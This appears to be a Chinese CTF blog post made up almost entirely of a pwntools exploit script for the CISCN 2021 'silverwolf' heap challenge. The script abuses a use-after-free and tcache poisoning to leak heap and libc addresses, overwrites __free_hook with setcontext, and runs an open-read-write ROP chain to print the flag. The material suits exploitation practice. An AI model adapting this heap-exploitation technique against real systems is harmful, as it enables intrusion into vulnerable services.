练习5 | 0xa6's bolg

[CISCN 2021 初赛]silverwolf

题目链接 : https://www.nssctf.cn/problem/912

from pwn import *

io = remote("node4.anna.nssctf.cn", 28120)
#io = process("./silverwolf")
elf = ELF("./silverwolf")
libc = ELF("./libc-2.27.so")
context(os='linux', arch='amd64')
#context.log_level='debug'
def debug():
    gdb.attach(io)

def malloc(size):
    io.sendlineafter(b'Your choice: ',str(1).encode())
    io.sendlineafter(b'Index:',str(0).encode())
    io.sendlineafter(b'Size:',str(size).encode())

def edit(content):
    io.sendlineafter(b'Your choice: ',str(2).encode())
    io.sendlineafter(b'Index:',str(0).encode())
    io.sendlineafter(b'Content:',content)

def show():
    io.sendlineafter(b'Your choice: ',str(3).encode())
    io.sendlineafter(b'Index:',str(0).encode())

def free():
    io.sendlineafter(b'Your choice: ',str(4).encode())
    io.sendlineafter(b'Index:',str(0).encode())


malloc(0x78)
free()
show()
io.recvuntil(b'Content: ')
chunk_base = u64(io.recv(6)[-6:].ljust(8, b'\x00')) - 0x11b0
print(f'chunk:{hex(chunk_base)}')
edit(p64(chunk_base + 0x16a0))
malloc(0x78)
malloc(0x78)
for i in range(6):
    edit(p64(chunk_base + 0x16a0) + b'a')
    free()
show()
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc.sym["__malloc_hook"] - 0x70
print(f'libc:{hex(libc_base)}')
rdi = 0x215bf + libc_base
ret = 0x215c0 + libc_base
rdx_rsi = 0x130569 + libc_base
rax = libc_base + 0x43ae8
rsp = 0x3960 + libc_base
read = libc_base + libc.sym["read"]
write = libc_base + libc.sym["write"]
free_hook = libc_base + libc.sym["__free_hook"]
syscall = libc_base + libc.sym['read'] + 0xf
malloc(0x50)
free()
edit(p64(0)*2)
free()
edit(p64(free_hook))
malloc(0x50)
malloc(0x50)
edit(p64(libc_base + libc.sym["setcontext"] + 0x35))
malloc(0x68)
payload = b''.ljust(0x30, b'\x00') + p64(chunk_base + 0x1398) + p64(ret) + p64(rsp) + p64(chunk_base + 0x10d8)
edit(payload)
malloc(0x68)
payload = b'flag'.ljust(8, b'\x00') + p64(rdi) + p64(chunk_base + 0x10d0) + p64(rdx_rsi) + p64(0) * 2 + p64(rax) + p64(2) + p64(syscall) + p64(rsp) + p64(chunk_base + 0x12f0)
edit(payload)
malloc(0x68)
payload =p64(rdi) + p64(3) + p64(rdx_rsi) + p64(0x30) + p64(chunk_base + 0x16a8) + p64(read) + p64(rdi) + p64(1) + p64(rdx_rsi) + p64(0x30) + p64(chunk_base + 0x16a8) + p64(write)
edit(payload)
#debug()
io.interactive()